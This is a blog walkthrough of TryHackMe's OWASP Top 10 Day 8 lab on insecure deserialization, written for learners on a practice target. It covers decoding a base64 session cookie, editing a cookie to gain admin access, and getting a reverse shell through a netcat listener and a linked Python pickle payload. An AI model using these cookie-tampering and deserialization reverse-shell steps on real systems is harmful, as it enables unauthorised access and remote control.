Try Hack Me: OWASP Top 10 Room Day 8 of 10

This is a FREE (meaning you don’t have to pay for subscription, just create an account) room on Try Hack Me that contains challenges with a goal to teach one of the OWASP vulnerabilities everyday for 10 days in a row. The challenges are:

Day 1: Injection

Day 2: Broken Authentication

Day 3: Sensitive Data Exposure

Day 4: XML External Entity

Day 5: Broken Access Control

Day 6: Security Misconfiguration

Day 7: Cross-site Scripting

Day 8: Insecure Deserialization

Day 9: Components with Known Vulnerabilities

Day 10: Insufficient Logging & Monitoring

Today’s challenge is Day 8: Insecure Deserialization. I blurred the answers so you will have to do the steps yourself to reveal them.

Below are the challenge questions: (I was assigned an IP of 10.10.119.122. Check your assigned IP address, yours will be different from mine).

[Task 26] [Day 8] Question 1: 1st flag (cookie value)

• Visit http://10.10.166.76 and create an account. After logging in, right click on the page and choose “Inspect Element”

Inspect Element

• By default the window that pops out lands on the “Inspector” tab. Click on the “Storage” tab, and copy the value of the sessionId which will be an encoded base64. We have to decode it to retrieve our first flag.
• Use this command to decode a base64 echo ‘paste the base64 here in between the single quotes’ | base64 --decode

To decode a base64

Flag for [Task 26] [Day 8] Question 1

[Task 26] [Day 8] Question 2: 2nd flag (admin dashboard)

• Change the value for userType from “user” to “admin” and hit enter

UserType value is user

User value changed to “admin”

• Navigate to http://10.10.166.76/admin to retrieve the 2nd flag

Flag for [Task 26] [Day 8] Question 2

• Revert back the value of the userType from “admin” to “user” and then navigate back to http://10.10.166.76/myprofile

• Click on “Exchange your vim” and click “Provide feedback!”

• Enter a random feedback and click “Submit Feedback”

• Start a netcat listener from your Kali machine. You can choose whichever port but I will be using 4444

Netcat is currently listening and waiting for an incoming connection

• Create a python file on your Kali machine. I will use rce.py like the room creator did

• Go to this link to copy the source code for the payload that we will be using to spawn a reverse shell https://gist.github.com/CMNatic/af5c19a8d77b4f5d8171340b9c560fc3 and paste the code to the file rce.py. Make sure to replace the “YOUR_TRYHACKME_VPN_IP” to your Kali’s VPN IP address (make sure to pick the tun0 adapter IP and not the eth0). Then save the file.

The payload we will use to get a reverse shell

• Run the payload by typing python3 rce.py
• Copy and paste the result on the terminal. Just copy the data in between the single quote marks

• Enter the data from the above screenshot to the value of “encodedPayload”

• Refresh the page and look at the netcat listener that you set up on your Kali

Now we got a reverse shell

• Now, all that is left is to look for the flag.

Got the final flag!

I am not getting paid by Try Hack Me to say this, but go and sign up for a free account on https://tryhackme.com